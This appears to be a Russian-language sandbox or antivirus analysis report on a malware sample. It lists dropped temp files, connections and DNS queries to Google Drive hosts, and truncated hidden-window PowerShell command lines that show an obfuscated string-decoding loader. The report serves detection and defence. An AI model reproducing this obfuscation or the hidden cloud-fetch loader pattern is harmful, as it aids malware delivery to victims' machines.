Техническая информация
- %WINDIR%\temp\cab1b3e.tmp
- %WINDIR%\temp\tar1b3f.tmp
- %WINDIR%\temp\cab3249.tmp
- %WINDIR%\temp\tar324a.tmp
- %APPDATA%\bitccc0.tmp
- %APPDATA%\bitccc0.tmp
- %WINDIR%\temp\cab1b3e.tmp
- %WINDIR%\temp\tar1b3f.tmp
- %WINDIR%\temp\cab3249.tmp
- %WINDIR%\temp\tar324a.tmp
- %APPDATA%\bitccc0.tmp в %APPDATA%\uran.tra
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Spiket Dayberrys Teratolog grammatiks #>;Function Nonintelle ([String]$Levneds){$Chaste=8;$Xylotypog=Unsteri4($Levneds);For($Clinost=7; $Clinost -lt $Xylotypog; $Clinost+=$Chaste){$Unsteri=$...
- '%WINDIR%\syswow64\wermgr.exe' "-outproc" "2376" "1624"